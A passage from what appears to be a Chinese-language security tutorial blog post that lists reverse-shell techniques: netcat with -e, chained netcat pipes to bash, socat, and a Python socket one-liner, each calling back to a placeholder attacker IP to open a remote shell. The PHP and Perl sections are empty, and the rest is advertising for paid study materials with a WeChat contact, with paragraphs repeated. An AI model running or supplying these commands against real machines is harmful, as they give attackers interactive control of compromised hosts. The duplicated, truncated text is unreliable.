【安全知识】，网络安全开发需要学什么

三、nc反弹

1、支持-e参数

如果目标机器上的nc支持-e参数，如下就可以直接反弹

攻击机执行

nc -lnvp 端口

目标机器执行如下命令反弹shell

nc -e /bin/bash x.x.x.x port

效果如下

2、不支持-e参数

这里讲的就是另外一种情况，目标机器上有nc，但是nc的版本不支持e参数，这里就给大家介绍一个技巧——NC串连

kali攻击机上开启两个终端监听不同端口分别用于接收输入和输出

目标机器上使用nc串联反弹权限

nc 客户端的ip 第一个端口|/bin/bash |nc 客户端的ip  第二个端口

详细给大家讲一下服务端执行这条命令的意思

语句的前半部分****服务端nc将shell回弹到客户端ip的第一个端口，此时客户端开启对第一个端口的监听并成功建立连接（但这里并不是交互式shell，看不到命令执行的结果），语句后半部分意思就是将用户在第一个端口建立的shell上的命令执行结果作为第二个端口的输出内容，此时用户再用客户端nc监听并连接第二个端口，这样就可以实现攻击者在第一个端口输入命令，在第二个端口就能看到命令执行的结果

效果如下

 这样我们再4567端口的监听页面输入的命令的回显结果就会在1234端口的监听页面显示

这招巨好用，大家可以多看看或者下去自己试一下

四、socat反弹

socat是一个用于数据转发的命令行工具，它可以在两个端口之间建立虚拟通道，将数据从一个端口转发到另一个端口，同时支持很多网络协议。

1、攻击机开启监听

2、目标机器使用socat反弹shell

执行如下命令

socat exec:‘bash -li’,pty,stderr,setsid,sigint,sane tcp:x.x.x.x:port

x.x.x.x是攻击机的ip

port是攻击机开启的监听端口

3、效果如下

五、Python反弹

1、攻击机开启监听

nc -lnvp port

我这里用的是

nc -lnvp 1234

2、目标机器使用python反弹shell

python -c “import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((‘x.x.x.x’,port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([‘/bin/bash’,‘-i’]);”

x.x.x.x是攻击机的ip

port是攻击机开启的监听端口

3、效果如下

六、PHP反弹

1、攻击机开启监听

nc -lnvp port

2、目标机器上使用php反弹shell

3、效果如下

七、Perl反弹

1、攻击机开启监听

自我介绍一下，小编13年上海交大毕业，曾经在小公司待过，也去过华为、OPPO等大厂，18年进入阿里一直到现在。

深知大多数网络安全工程师，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！

因此收集整理了一份《2024年网络安全全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，基本涵盖了95%以上网络安全知识点，真正体系化！

由于文件比较大，这里只是将部分目录大纲截图出来，每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频，并且后续会持续更新

如果你觉得这些内容对你有帮助，可以添加VX：vip204888 （备注网络安全获取）

写在最后

在结束之际，我想重申的是，学习并非如攀登险峻高峰，而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后，持之以恒的学习变得愈发不易，如同在茫茫大海中独自划舟，稍有松懈便可能被巨浪吞噬。然而，对于我们程序员而言，学习是生存之本，是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习，我们便如同逆水行舟，不进则退，终将被时代的洪流所淘汰。因此，不断汲取新知识，不仅是对自己的提升，更是对自己的一份珍贵投资。让我们不断磨砺自己，与时代共同进步，书写属于我们的辉煌篇章。

需要完整版PDF学习资源私我

一个人可以走的很快，但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎扫码加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！

，更是对自己的一份珍贵投资。让我们不断磨砺自己，与时代共同进步，书写属于我们的辉煌篇章。**

需要完整版PDF学习资源私我

一个人可以走的很快，但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎扫码加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！
[外链图片转存中…(img-Xj8Uou0d-1712763036047)]